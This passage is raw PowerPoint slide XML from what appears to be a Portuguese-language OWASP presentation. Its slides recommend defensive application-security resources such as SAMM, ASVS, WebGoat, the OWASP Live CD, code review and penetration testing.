              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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3043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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61563" rIns="285387" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Para melhorar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> o processo que a sua organização segue ao desenvolver aplicações, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>OWASP recomenda o</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>M</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>odelo de Maturidade de Garantia do Software </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>(SAMM)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. Este modelo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> ajuda a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>organização a formular e implementar estratégias para segurança de software customizadas para os riscos específicos que a organização enfrenta. </a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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0189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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27432" tIns="64946" rIns="27432" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Segurança do Ciclo de Vida do Desenvolvimento</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7125419"/>
              <a:ext cx="5608321" cy="873370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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3043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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61563" rIns="285387" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>Projeto de Educação OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> oferece material de treinamento</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> para</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t> ajudar a educar desenvolvedores em segurança de aplicações web e uma lista extensa de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>Apresentações Educacionais do OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. Para </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>treinamento prático sobre vulnerabilidades,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> use o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, ou o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>Projeto OWASP Broken Web Applications</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. Para se manter atualizado, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>participe de uma</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>Conferência AppSec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t> do OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, um</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> Evento de Treinamento </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>OWASP, ou de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t> reuniões</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t> de um Capítulo local do O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId20"/>
                </a:rPr>
                <a:t>WASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>
              <a:ext cx="940189" cy="1015959"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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0189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Educação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0"/>
                <a:t>em Segurança de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Aplicações</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32958114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27033150"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="3368040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Organize-se</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1100" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="29171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000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Para verificar a segurança da aplicação</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> web que você desenvolveu, ou de uma aplicação que esteja considerando adquirir, o OWASP recomenda verificar o código fonte da mesma (se disponível), bem como testar a aplicação. O OWASP recomenda combinar a revisão de segurança do código com o teste de invasão sempre que possível, pois isto permite aproveitar as vantagens das duas técnicas, aliado ao fato que as duas se complementam. As ferramentas para ajudar no processo de verificação podem melhorar a eficiência e a eficácia de um analista experiente. As ferramentas de verificação do OWASP são focadas em ajudar o especialista a ser mais eficaz, ao invés de simplesmente automatizar o processo de análise. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="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sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Padronizando o Processo de Verificação da Segurança em Aplicações Web: Para ajudar as organizações a desenvolver consistência e um nível definido de rigor ao avaliar a segurança de aplicações web, OWASP criou o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Padrão de Verificação de Segurança de Aplicações (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>. Este documento define um padrão mínimo de verificação para testar a segurança de aplicações web. OWASP recomenda usar o ASVS não apenas para saber o que procurar quando for verificar a segurança da aplicação, mas também para saber quais técnicas são mais apropriadas, e para ajudar a definir e selecionar o nível de rigor dessa verificação. O OWASP também recomenda usar o ASVS para ajudar a definir e selecionar os tipos de serviços de verificação de terceiros, se for contratar este serviço. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="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sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Conjunto de Ferramentas de Verificação: O </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Projeto OWASP Live CD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> compilou algumas das melhores ferramentas abertas de segurança em um ambiente único ou em uma máquina virtual (VM). Desenvolvedores web, responsáveis pelos testes e profissionais de segurança podem dar partida no seu sistema usando o CD ou executando a máquina virtual para acessar um conjunto completo de testes de segurança. Não é necessário instalar ou configurar nada para usar as ferramentas do CD.</a:t>
                      </a:r>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Próximos Passos para Verificadores</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+V</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1715264749"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4343400"/>
          <a:ext cx="3505200" cy="4800600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3505200"/>
              </a:tblGrid>
              <a:tr h="340456">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Revisão de Código</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1100" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="4460144">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
